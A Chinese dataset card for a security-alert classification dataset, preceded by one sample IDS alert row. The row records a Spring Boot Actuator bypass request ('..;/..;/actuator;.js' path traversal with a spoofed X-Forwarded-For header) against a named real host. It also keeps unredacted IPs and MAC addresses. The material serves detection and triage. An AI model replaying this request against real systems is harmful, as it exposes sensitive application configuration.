Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732689395", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "539", "h_proto_version": "HTTP/1.1", "uri": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "175.178.12.116", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "519", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3l5L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM182KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzYuMC4zODA5LjEwMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LHpoLUNOO3E9MC44LHpoO3E9MC43DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANCkROVDogMQ0KUmVmZXJlcjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_10b056be2df40b76760a881c403cde9e", "access_time": "2024-11-27 14:36:56", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "175.178.12.116", "dimension": "3", "url_path": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.13\", \"software\": \"Chrome/76.0.3809\", \"hw_type\": \"PC\"}}", "sport": "48412", "h_url": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
End of preview. Expand
in Data Studio
YAML Metadata
Warning:
The task_ids "text-classification" is not in the official list: acceptability-classification, entity-linking-classification, fact-checking, intent-classification, language-identification, multi-class-classification, multi-label-classification, multi-input-text-classification, natural-language-inference, semantic-similarity-classification, sentiment-classification, topic-classification, semantic-similarity-scoring, sentiment-scoring, sentiment-analysis, hate-speech-detection, text-scoring, named-entity-recognition, part-of-speech, parsing, lemmatization, word-sense-disambiguation, coreference-resolution, extractive-qa, open-domain-qa, closed-domain-qa, news-articles-summarization, news-articles-headline-generation, dialogue-modeling, dialogue-generation, conversational, language-modeling, text-simplification, explanation-generation, abstractive-qa, open-domain-abstractive-qa, closed-domain-qa, open-book-qa, closed-book-qa, slot-filling, masked-language-modeling, keyword-spotting, speaker-identification, audio-intent-classification, audio-emotion-recognition, audio-language-identification, multi-label-image-classification, multi-class-image-classification, face-detection, vehicle-detection, instance-segmentation, semantic-segmentation, panoptic-segmentation, image-captioning, image-inpainting, image-colorization, super-resolution, grasping, task-planning, tabular-multi-class-classification, tabular-multi-label-classification, tabular-single-column-regression, rdf-to-text, multiple-choice-qa, multiple-choice-coreference-resolution, document-retrieval, utterance-retrieval, entity-linking-retrieval, fact-checking-retrieval, univariate-time-series-forecasting, multivariate-time-series-forecasting, visual-question-answering, document-question-answering, pose-estimation
Dataset Card for Security Alert Classification Dataset
Dataset Summary
该数据集包含安全告警日志数据,用于训练大模型判断安全告警是真实攻击还是误报。数据集采用Alpaca格式,包含instruction、input和output三个字段。
Supported Tasks and Leaderboards
- Task: 安全告警分类
- Task Type: 文本分类
- Languages: 中文
Languages
数据集中的文本为中文。
Dataset Structure
Data Instances
每个样本包含以下字段:
- instruction: 任务说明,指导模型作为网络安全告警分析专家分析安全告警日志
- input: 告警日志数据(JSON格式),包含多种安全告警的详细信息
- output: 标签("攻击"或"误报")
Data Fields
- instruction: 字符串,任务说明
- input: 字符串,JSON格式的告警日志数据,包含告警来源、攻击类型、漏洞类型、危害等级、payload等信息
- output: 字符串,分类标签
Data Splits
- 训练集:508条样本
- 攻击样本:291条 (57.3%)
- 误报样本:217条 (42.7%)
Dataset Creation
Curation Rationale
该数据集用于训练大模型进行安全告警分类,帮助安全分析师快速识别真实攻击和误报。
Source Data
Initial Data Collection and Normalization
原始数据来自安全告警系统,包含各种类型的安全告警,如SQL注入、命令执行、信息泄露、扫描行为等。
Who are the source language producers?
安全分析师
Annotations
Annotation process
由安全分析师人工标注
Who are the annotators?
安全分析师
Personal and Sensitive Information
数据集中的IP地址和MAC地址等敏感信息已存在,但未进行进一步脱敏处理。
Considerations for Using the Data
Social Impact of Dataset
该数据集可以帮助提高安全告警分析的效率,减少误报带来的资源浪费。
Discussion of Biases
数据集存在一定程度的类别不平衡问题,攻击样本约占57.3%,误报样本约占42.7%。
Other Known Limitations
- 数据集规模较小,仅包含508条样本
- Downloads last month
- 47